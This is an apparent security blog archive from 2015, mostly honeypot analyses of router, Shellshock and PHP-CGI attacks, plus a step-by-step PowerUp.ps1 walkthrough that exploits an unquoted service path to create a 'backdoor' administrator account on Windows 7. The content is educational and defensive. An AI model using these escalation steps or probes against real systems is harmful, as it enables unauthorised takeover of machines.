Saturday, March 28, 2015

What's in the honeypot? CVE-2014-4019 - Attack on SOHO Router to Download Admin Password

Looking at the honeypots one more time today I found the miscreants searching for an unprotected router configuration that provides the username and password.  With access to the router, they are known to modify its DNS settings to conduct man-in-the-middle attacks, intercepting or relaying all traffic through their servers.

Below is the log entry that I found:

According to the exploit published on exploit-db (located here), requesting the rom-0 file through a GET request returns a file that contains the admin username and password.  The following link gives instructions on how to decompress the file.

The following CVEs have been recorded for the vulnerabilities that have been identified:
CVE-2014-4018
CVE-2014-4019
CVE-2014-4154
CVE-2014-4155
Also applicable is http://www.exploit-db.com/exploits/33737

Here is an article by SC Magazine about 300,000 SOHO routers that were compromised due to this vulnerability: http://www.scmagazine.com/attackers-alter-dns-configurations-remotely-compromise-300k-routers/article/336792/

I am also interested in the IP Address that touched the honeypot looking for this vulnerability.  The IP Address is 95.213.143.180.  Looking it up at ripe.net pulls the following record:


When you search for this IP Address on http://www.virustotal.com nothing comes up about this IP Address. 

However, as you search the web you find a history for this IP Address as shown below:

https://twitter.com/atma_es/status/575725495708479488
http://www.blocklist.de/en/view.html?ip=95.213.143.180

If you do a reverse DNS lookup no PTR records are identified.  



What's in the honeypot? Shellshock to Remote Control / DDoS Bot

Today, in searching through what is gathered in the honeypots, we found yet another attempt at executing commands through the Shellshock vulnerability.  Below is the log that we are going to look at more closely.


Looking at the information provided in the log above we gather the following 2 IP Addresses.

222.66.95.253 - Using APNIC.net the below information is returned about the IP Address
descr:CHINANET shanghai province network
descr:China Telecom
descr:No1,jin-rong Street
descr:Beijing 100032
country:CN


61.160.212.172 - Using APNIC.net the below information is returned about the IP Address
descr:CHINANET jiangsu province network
descr:China Telecom
descr:A12,Xin-Jie-Kou-Wai Street
descr:Beijing 100088
country:CN

Inside the User-Agent, where the command is being executed through the Shellshock vulnerability, is the download of a file called java.  After downloading this file you can see that it is an "ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped"

If we look at the strings of this file we are able to pull out a few artifacts of interest.  The first is an email address, "keld@dkuug.dk".  This email is probably not related to the malware itself; it is more likely referenced in a library that is used inside the malware.

Then, looking at the strings, you can identify what the malware is used for after it is executed:

It appears that this is being used on a Linux server to play a part in DDoS attacks.  You can see the attack on UDP (possibly NTP), SYN attack, ICMP attack, DNS and DNS amplification attacks, and others.  Then in the strings you come across a list of IP Addresses.  As I looked at a few of these addresses they appeared to be in Asia.


Looking at the IP Addresses I am not sure whether these are targets of the DDoS, IP Addresses to avoid, or just a list of IP Addresses they decided to place in the malware.

Upon execution the malware makes a static connection over port 25000 back to the IP Address that the malware came from.


The malware also copies itself into /usr/bin and creates a hidden file called .sshd.

After uploading the malware to virustotal its initial detection went back to early March.  It confirmed my theory of it being a tool used in DDoS and to remotely control the server.  If you would like to go to the information on virustotal.com click here.

Also in the research I found that it was trying to do a DNS lookup for the domain lzj.passwd1.com.
This domain is flagged on virustotal and you can see the results here.

Looking at the parent domain, passwd1.com, you find that it is related to other activity that is flagged by virustotal.

You also learn that it is registered at godaddy.com.  The above information can be found here.  Looking at the history of this domain it has an interesting past going back to June 6, 2014.

Wednesday, March 25, 2015

What's in the honeypot? SSH Scanning leads to Interesting Domain

SSH scanning appears to be a popular activity for a honeypot to capture.  I thought I would share what I have seen in my honeypots thus far.

Below are the top 10 IP Addresses that have scanned my honeypots with the number of occurrences they appear in the logs:
1: 103.41.124.109 - 2,390
2: 103.41.124.64 - 2,332
3: 103.41.124.38 - 2,125
4: 58.218.211.166 - 2,104
5: 113.195.145.12 - 1,728
6: 103.41.124.65 - 1,683
7: 182.100.67.112 - 1,604
8: 113.195.145.80 - 1,555
9: 59.47.0.152 - 1,472
10: 103.41.124.28 - 1,371

These statistics were pulled from multiple honeypots into a single file and then I wrote the below python script to aggregate the total number of occurrences:

#!/usr/bin/python
# Sums the count column of "ip count" lines; the input must be sorted by IP
# so that all lines for one address are adjacent.

priorLine = ''
priorCalc = 0
with open('stats.temp', 'r') as f:
    for line in f:
        item = line.split()
        if not item:
            continue  # skip blank lines
        if priorLine == item[0]:
            priorCalc = priorCalc + int(item[1])
        else:
            if priorLine:  # do not print the empty starting value
                print(priorLine + " " + str(priorCalc))
            priorLine = item[0]
            priorCalc = int(item[1])
# Flush the final group, which the loop never prints on its own.
if priorLine:
    print(priorLine + " " + str(priorCalc))

From the top 10 IP addresses above I wanted to see if any of them appeared in more than 1 honeypot. Surprisingly enough the below 3 IP Addresses appeared in more than 1:
103.41.124.109
58.218.211.166
182.100.67.112
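The same aggregation, extended to keep track of which honeypot each count came from, so the top-10 list and the "seen on more than one honeypot" check above both fall out of a single pass. This is an added example, not the post's script; it assumes the combined file has "<honeypot> <ip> <count>" lines, and the sample data is constructed (chosen so the totals match the figures above).

```python
#!/usr/bin/env python3
"""Aggregate per-honeypot scan counts and flag sources seen on more than one.

Added example (not the post's script). Input lines are assumed to look like
"<honeypot> <ip> <count>", one per (honeypot, IP) pair, in any order.
"""
from collections import defaultdict

# Constructed sample, not real log data; totals chosen to match the post's top 10.
SAMPLE = """\
hp1 103.41.124.109 1500
hp2 103.41.124.109 890
hp1 103.41.124.64 2332
hp1 58.218.211.166 1200
hp3 58.218.211.166 904
hp2 182.100.67.112 1000
hp3 182.100.67.112 604
hp2 113.195.145.12 1728
"""

def parse(lines):
    """Return {ip: {honeypot: count}}; blank or malformed lines are skipped."""
    seen = defaultdict(dict)
    for line in lines:
        parts = line.split()
        if len(parts) != 3:
            continue
        hp, ip, count = parts
        try:
            n = int(count)
        except ValueError:
            continue  # non-numeric count: ignore the line
        seen[ip][hp] = seen[ip].get(hp, 0) + n
    return seen

def totals(seen):
    """Total occurrences per IP across all honeypots."""
    return {ip: sum(c.values()) for ip, c in seen.items()}

def top_n(seen, n=10):
    """(ip, total) pairs, highest first; ties broken by IP string for stability."""
    return sorted(totals(seen).items(), key=lambda kv: (-kv[1], kv[0]))[:n]

def multi_honeypot(seen):
    """IPs observed on more than one honeypot: a better signal than raw volume."""
    return sorted(ip for ip, c in seen.items() if len(c) > 1)

if __name__ == "__main__":
    data = parse(SAMPLE.splitlines())
    for rank, (ip, total) in enumerate(top_n(data), 1):
        print("%d: %s - %s" % (rank, ip, format(total, ",")))
    print("Seen on more than one honeypot:", ", ".join(multi_honeypot(data)))
```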

Using a whois lookup on these IP Addresses the below information can be derived.  Again the information returned does not provide attribution in any way to the country or owners of the IP Addresses.

IP Address: 103.41.124.109
IP Range: 103.41.124.0 - 103.41.124.255
Description: HEETHAI LIMITED
Country: CN (China)

IP Address: 58.218.211.166
IP Range: 58.208.0.0 - 58.223.255.255
Description: CHINANET jiangsu province network
Description: China Telecom
Country: CN

IP Address: 182.100.67.112
IP Range: 182.96.0.0 - 182.111.255.255
Description: CHINANET JIANGXI PROVINCE NETWORK
Description: China Telecom
Country: CN

I also wanted to see if these IP Addresses showed up in virustotal as serving malware or having a history of malicious websites associated with them:

IP Address: 103.41.124.109 came back with no malicious domains being associated so far.

IP Address: 58.218.211.166 came back with the following information:
IP Address: 182.100.67.112 came back with the following information:

From the above research about the IP Addresses we identify some domains and URLs of interest.  First I am going to look at the registrations of the domains:

IP Address: 58.218.211.166
Domain: a1.33lc.com
By searching for this domain, the following IP Addresses have been associated with it over time.
From the listing above, the most recent URL for this domain currently points to IP Address 222.187.225.118.  After looking at this IP Address I wanted to see if the last file uploaded from that domain still existed.  Sure enough, I could still download the file below:

Finding that the file was an APK, or Android package, I pulled it down.  An APK file is nothing more than a zip file.  We are looking for the dex file inside of the APK, so I unzipped it with the following command:

Checksum of APK: 77696c5fc37ce4881a319c1b962b74f1
unzip sosmap_android.apk classes.dex

Then with the classes.dex file I needed to extract the Java source code.  I can convert the dex file to Java class files by executing the following command:

Checksum of the dex file: fee0756c47a10382161d720083342c65
dex2jar classes.dex

This creates the file classes_dex2jar.jar.  The jar file can then also be unzipped.

The decompiled jar file has the following checksum: 06538782eaa69970f54b59f1d30c60bc

Well I have chased this down the rabbit hole as far as I want to go.  Enjoy!

Monday, March 23, 2015

What's in the honeypot? Banner Information Gathering System by gatech.edu

I have been watching for a while the IP Address 128.61.240.66, which would appear in the logs almost every day as shown in the picture below:

Noticing the URL, or what appears to be a URL, in the banner, I wanted to know more about these scan occurrences.  First I googled it and then I visited the site; this is what you see upon visiting "http://netscan.gtisc.gatech.edu":

I find it intriguing that this project collects the banners and then monitors them as they change.  This would provide information on patches deployed to web servers, up-time, and change among the web servers.  I thought I would go a little further and try to find out whether they release this information on their website at https://gtisc.gatech.edu/index.html.

From the links provided at this site I could not find this information but I did find the following links to be of interest:

Emerging Cyber Threats Report 2015 

2014 Georgia Tech Cyber Security Summit

Sunday, March 22, 2015

What's in the honeypot? "The Moon" malware is self-replicating and impacts Linksys E Routers - CVE-2013-5122

As I was looking through the logs of the honeypot I found the following occurring:



Well if you google "/tmUnblock.cgi" you find that this scan is related to "The Moon" malware.  This malware impacts Linksys E series routers that are used by many home users.  After a Linksys E series router is infected it will scan for other vulnerable routers and try to infect them.

Linksys has since patched the vulnerability, but applying the fix requires a firmware update on the router.  Well, maybe the IP addresses that are scanning my honeypot are infected Linksys routers.

Well, without actually scanning them I will not know whether they are vulnerable, but I thought I would look them up using arin.net or other registries to see whether the network each IP is on suggests a residential ISP or a small business.

103.30.91.46 - PT Metroptix Lintas Nusa - Indonesia
173.89.8.170 - RRMA Time Warner Cable - US
74.143.224.154 - Insight Communications Corp - US
174.45.250.19 - Net-Core-BB-3 - Charter Communications - US
50.20.209.110 - CBeyond Communications LLC - US
173.18.39.9 - MediaCom Communications Corp - US
 
Again I am not sure but looking at the subnet ranges it appears that all but one is possibly a residential ISP or a small business.

Well if the router is infected with this malware, this is an indicator that the router can be used to cause a DDoS attack or be in a mesh of other devices to cover the tracks of miscreants causing trouble.  

Here is the link to the vulnerability as described by Cisco who owns Linksys:  http://tools.cisco.com/security/center/viewAlert.x?alertId=32899

The link to the CVE that describes the vulnerability is located here:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5122

Saturday, March 21, 2015

What's in the honeypot? CVE-2012-1823 execute arbitrary code in PHP before 5.3.12 and 5.4.x before 5.4.2

I thought I would create a series of posts about what I have collected and will collect in my honeypot that is running.  This is again only meant for educational purposes, and as I discuss what is found I am not attributing it to anyone.

Here is one of the first items that I would like to touch on:

The POST request to the honeypot hit a path that was not found, so the honeypot returned a 404 error.  However, I wanted to understand what was hex encoded.  I dug back into my archive and found my hex decoder at the following link.

Notice also that when I copy the hex-encoded pattern the letters are in upper-case while my decoder expects lower-case.  So I found a quick sed command to convert the letters to lower-case, as shown below.


After I decoded the hex I found the following text:


Noticing that -d looks to be an option, I did a search for PHP options.

From the above command switch it appears that they are trying to change php.ini entries.  After a little more searching, the following exploit published to exploit-db came up addressing CVE-2012-1823.  The exploit is located here.

Evaluating the pststr() variable that the exploit creates, it matches the same patterns I have seen in the honeypot.

Also reading about the exploit you find that the payload is actually in the POST data that is sent with the web request.  The description of the vulnerability as posted on the CVE page is, "sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case".
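The probes from this post and from the earlier rom-0, Shellshock and The Moon posts each leave a recognisable request line or header, so they can be triaged from the honeypot log in a single pass. The script below is an added example, not the blog's own tooling; it assumes combined-format log lines, the sample entries are constructed, and the php-cgi check follows the CVE text quoted above: a query string with no literal '=' that decodes to something beginning with '-'.

```python
#!/usr/bin/env python3
"""Triage honeypot web logs for the probes described in these posts.

Added example, not the blog's own tooling. Assumes Apache/nginx "combined"
log lines (request line, then quoted Referer and User-Agent) and flags only
what the posts describe: GET /rom-0 (CVE-2014-4019), /tmUnblock.cgi (The
Moon, CVE-2013-5122), a "() {" function definition in a header (Shellshock)
and php-cgi option injection through a hex-encoded query string that has no
literal '=' (CVE-2012-1823). Sample lines are constructed; 198.51.100.0/24 is
a documentation range, not a real source.
"""
import re
from urllib.parse import unquote_plus

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

SAMPLE_LOG = r'''
198.51.100.10 - - [28/Mar/2015:10:01:02 +0000] "GET /rom-0 HTTP/1.1" 404 162 "-" "Mozilla/5.0"
198.51.100.11 - - [22/Mar/2015:03:14:15 +0000] "POST /tmUnblock.cgi HTTP/1.1" 404 162 "-" "-"
198.51.100.12 - - [28/Mar/2015:11:22:33 +0000] "GET / HTTP/1.0" 200 612 "-" "() { :;}; /bin/sh -c 'wget http://198.51.100.12/java'"
198.51.100.13 - - [21/Mar/2015:08:09:10 +0000] "POST /cgi-bin/php?%2D%64+%64%69%73%70%6C%61%79%5F%65%72%72%6F%72%73%3D%31 HTTP/1.1" 404 162 "-" "curl/7.35"
198.51.100.14 - - [21/Mar/2015:08:09:11 +0000] "GET /index.php?page=1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
'''.strip().splitlines()

def decode_query(target):
    """Percent-decode the query string; upper- and lower-case hex both decode."""
    return unquote_plus(target.split('?', 1)[1]) if '?' in target else ''

def php_cgi_option_injection(target):
    """CVE-2012-1823 tell: a query string with no literal '=' is handed to
    php-cgi as command-line options, so one that decodes to '-...' is hostile."""
    if '?' not in target:
        return False
    raw_query = target.split('?', 1)[1]
    if '=' in raw_query:
        return False
    return decode_query(target).lstrip().startswith('-')

def classify(entry):
    """Return the list of tags that apply to one parsed log entry."""
    tags = []
    path = entry['target'].split('?', 1)[0]
    if path.endswith('/rom-0'):
        tags.append('rom-0 config download (CVE-2014-4019)')
    if path.endswith('/tmUnblock.cgi'):
        tags.append('The Moon scan (CVE-2013-5122)')
    if '() {' in entry['ua'] or '() {' in entry['ref']:
        tags.append('Shellshock in header')
    if php_cgi_option_injection(entry['target']):
        tags.append('php-cgi option injection (CVE-2012-1823)')
    return tags

def triage(lines):
    """Parse each line and return [(ip, target, tags)] for lines with any tag."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the run
        tags = classify(m.groupdict())
        if tags:
            hits.append((m['ip'], m['target'], tags))
    return hits

if __name__ == '__main__':
    for ip, target, tags in triage(SAMPLE_LOG):
        print(ip, target, '->', '; '.join(tags))
```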

Friday, March 6, 2015

The One Who Inspired My Career in Computers passed on Recently

The man who inspired me at an early age to get into computers, recently died, so I would like to take a moment and post about him.  I will refer to him as @brothersthree through-out this post.  Just prior to his passing I received from him multiple items that he continued to maintain in his possession.

@brothersthree went to college and during his time there he became familiar with computers and took an interest in them.  He decided to take some classes in which he would have to rent time on the mainframe to complete his assignments.  The access to the mainframe was limited based on seats and scheduling.  Most of the scheduling was taken up by those further along in their collegiate courses.  The times that were available were often during late hours of the night or early in the morning hours.

Then a telephone line or modem access was made available to the mainframe, again this was limited to number of connections but alleviated some of the congestion.  I am not sure if at this time or before he purchased a Kaypro II computer.


I barely remember the clicky keyboard, the large 5 1/4 drives, and the handle on the back to carry it.  Out of curiosity I had to look up the type of processor and memory that it had.  According to Wikipedia it contained a 2.5 MHz Zilog Z80 processor with 64 KB of RAM.  I remember being allowed to use WordStar on the computer and thinking how amazing it was.

As a young child I dreamed multiple times of working on this and was drawn to the click of the keyboard and the display of what I was typing on the screen.  After a short period of time, and I am not sure whether it was on his Kaypro or on a new 8086/8088, he introduced me to what I consider my first computer programming language: Turbo Pascal.  In the items I received from him was a 5 1/4 disk of Turbo Pascal version 3.01.

In this language, he wrote one of the first personal checkbook programs for the computer.  Amongst the items was a printout of the source code of version 4.0 of the checkbook program.
This program, and probably others, inspired @brothersthree to start a software company called "Brothers Three Software".  At the time I imagine version 1 came about, 1987-89, it was a foreign concept to most people to store your checkbook on a computer.  His efforts to market and sell this software never took off in his mind; however, I bet it inspired multiple people that he spoke with, or well, maybe it was only me.

Amongst the items I received were the original MS-DOS 6.22 disks as shown below:
Windows 3.11 3 1/4 disks, Windows 95, Windows 98 SE boot disk and Windows 98 SE install CD.



Also in the items were a few old sticks of memory as shown below:

He always had a passion for computers through-out his life.  I remembered and found a letter that he sent to me in early January 2000 about the impact of the Y2K bug:

"The Y2K bug died with very little things happening.  One state in October sent car titles out that were [made in the year] 2000 cars, but the state computer put them as [made in the year] 1900 cars and listed them as antiques.  So the state made the corrections.

The only real trouble with computers was in Delaware, where at the stroke of midnight a big computer went down.  The only thing it caused was 800 slot machines would not work, so the casino was not able to get any more money from the slots." 

This man, @brothersthree, inspired me at the age of about 7 to get into computers.  One of the first computer books that he introduced me to was the following:


I learned a little Turbo Pascal, progressed into BASIC, and then into Visual Basic and now into VBA, PHP, Visual Studio Products, Python, Bash, Perl, and many others.  May the legend of @brothersthree live on as being an early pioneer of computers and computer programming in Turbo Pascal.

Monday, March 2, 2015

Utilizing PowerUp.ps1 to Escalate Privileges on Windows 7 using an Unquoted Path Vulnerability

I found a great write-up by the Veris Group on how to use PowerUp.ps1 @ http://www.verisgroup.com/2014/06/17/powerup-usage/.  I thought I would take some time and walk through this tutorial on a Windows 7 box with a non-privileged user.

Following the Veris Group's instructions:

1. I downloaded the PowerUp.ps1 script from their github repo at https://github.com/HarmJ0y/PowerUp.  Notice as of Dec 2014 this repo is no longer supported.

2. Drop the file PowerUp.ps1 into a location you can write to.  I have a folder I created called c:\PowerUp.

3. Then execute "powershell.exe -nop -exec bypass" to enable the execution bypass.

4. Then execute "import-module c:\PowerUp\powerup.ps1" of the full path plus the filename of the powershell script.

5. To setup the stage of having a vulnerable service to demonstrate with, I modified the following registry key to allow for an unquoted path vulnerability.


6. I removed the quotes around the path listed in the ImagePath of the registry.  Sometimes this is as easy as checking to see if your user can modify these paths on any service that has started.

7. Then I modified the permissions to the VMWare folder to where the user can read/write to the directory.

8. The service normally does not start automatically, so I changed it to start automatically.


9. Now with this setup we can utilize the PowerUp.ps1 script to create a user account using this service.  

10. Using powerup.ps1 we now execute "Invoke-AllChecks".  The first check that it runs is for an unquoted path vulnerability and it finds the one that we setup.


11. Then we create the file that will create the backdoor account by the following command:

12. The service.exe file was created; now we copy that file into the directory "C:\Program Files\VMWare" and call it VMWare.exe.  It will execute instead of the service going into the "VMWare Tools" directory.  However, we do not have access to restart this service, so we need to wait for the user to reboot the machine.  With limited access, though, you could generate some errors for the user which would give them an indication that it needed to be rebooted.

13. After the workstation restarted, the service loads as the local service account and creates the account "backdoor" as an administrator on the workstation.


This is only one method of exploiting the unquoted path vulnerability on a workstation or server to gain administrative privileges on the computer.
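To audit for this weakness rather than exploit it, the check is mechanical: for every service whose ImagePath is unquoted and contains a space, list the paths Windows would try before the real executable and verify that none of those directories is writable by unprivileged users. The script below is an added example, not PowerUp or the Veris Group write-up; the service entries are constructed (the post does not name the VMWare binary, so vmtoolsd.exe is an assumption), and on Windows it can read the live Services key through the standard winreg module.

```python
#!/usr/bin/env python3
"""Audit service ImagePath values for the unquoted-path weakness shown above.

Added example, not part of PowerUp or the Veris Group write-up. It models how
Windows resolves an unquoted image path containing spaces: CreateProcess tries
each space-delimited prefix (appending ".exe" when the prefix has no
extension) before reaching the full path, so a writable directory anywhere in
that chain lets a planted binary run as the service account. The entries
below are constructed; the post does not name the VMWare binary, so
vmtoolsd.exe is an assumption.
"""
import sys

# Constructed samples: (service name, ImagePath as stored in the registry)
SAMPLE_SERVICES = [
    ("VMTools", r"C:\Program Files\VMWare\VMWare Tools\vmtoolsd.exe"),
    ("GoodSvc", r'"C:\Program Files\Good Vendor\svc.exe" -k netsvcs'),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("OddSvc", r"C:\Tools\My Agent\agent.exe --port 8080"),
]

def executable_part(image_path):
    """Drop arguments: keep everything up to and including the first '.exe'."""
    p = image_path.strip()
    idx = p.lower().find(".exe")
    return p[:idx + 4] if idx != -1 else p

def hijack_candidates(image_path):
    """Paths Windows would try, in order, before the real executable.

    Empty when the path is quoted or has no spaces (i.e. not vulnerable).
    """
    exe = executable_part(image_path)
    if exe.startswith('"') or " " not in exe:
        return []
    cands = []
    for i, ch in enumerate(exe):
        if ch == " ":
            prefix = exe[:i]
            if "." not in prefix.rsplit("\\", 1)[-1]:  # no extension: .exe is appended
                prefix += ".exe"
            cands.append(prefix)
    return cands

def audit(services):
    """Return {name: candidates} for each service with an exploitable path.
    The parent directory of every candidate should then be checked for write
    access by unprivileged users (icacls on Windows)."""
    findings = {}
    for name, image_path in services:
        cands = hijack_candidates(image_path)
        if cands:
            findings[name] = cands
    return findings

def live_services():
    r"""Yield (name, ImagePath) from HKLM\SYSTEM\CurrentControlSet\Services."""
    import winreg  # Windows-only stdlib module, imported lazily on purpose
    root = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services")
    i = 0
    while True:
        try:
            name = winreg.EnumKey(root, i)
        except OSError:
            break
        i += 1
        try:
            with winreg.OpenKey(root, name) as k:
                yield name, winreg.QueryValueEx(k, "ImagePath")[0]
        except OSError:
            continue  # no ImagePath value (e.g. driver groups) or access denied

if __name__ == "__main__":
    source = live_services() if sys.platform == "win32" else SAMPLE_SERVICES
    for name, cands in audit(list(source)).items():
        print(name)
        for c in cands:
            print("   tried before the real binary:", c)
```

For the VMWare entry the second candidate is exactly the "C:\Program Files\VMWare\VMWare.exe" path used in step 12, which is why write access to that folder matters.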

Sunday, March 1, 2015

Extract List of IP Addresses from a File using grep

I have run into multiple occurrences where I only want to see the IP Addresses in a given file.  Today I found with the help of Command Line Fu a quick way to parse a file and only return the unique IP Addresses found:

cat tmp.txt | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort | uniq

Sometimes I will use this to quickly parse out IP Addresses in an email.  The regular expression can be changed to extract domain names out of an email also.


Powershell - Gather Mapped Drives from a List of Computer Names

I created the following Powershell script to gather remotely the mapped drives that users had in their profiles.  I had to create the script...